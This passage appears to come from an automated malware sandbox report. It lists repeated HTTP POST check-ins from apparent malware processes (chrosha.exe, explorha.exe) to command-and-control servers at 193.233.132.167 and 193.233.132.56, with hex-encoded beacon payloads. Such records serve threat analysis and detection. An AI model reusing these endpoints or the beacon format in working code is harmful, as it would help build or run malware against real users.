                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      315192.168.2.550158193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.428483009 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.671046019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      316192.168.2.550159193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.567473888 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.814826012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      317192.168.2.550160193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.927284956 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.181022882 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      318192.168.2.550161193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.177280903 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.421849012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      319192.168.2.550162193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.540323973 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.784744024 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      320192.168.2.550163193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.677582026 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:26.930562019 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      321192.168.2.550164193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.037194014 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.291599035 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      322192.168.2.550165193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.286633015 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.531101942 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      323192.168.2.550166193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.645931005 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.889358044 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      324192.168.2.550167193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:27.791291952 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.047936916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      325192.168.2.550168193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.146821976 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.403692007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      326192.168.2.550169193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.409729004 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.657990932 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      327192.168.2.550170193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.765470982 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.016846895 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      328192.168.2.550171193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:28.909379005 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.160451889 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      329192.168.2.550172193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.271598101 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.523857117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      330192.168.2.550173193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.529052019 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.776853085 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      331192.168.2.550174193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:29.883701086 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
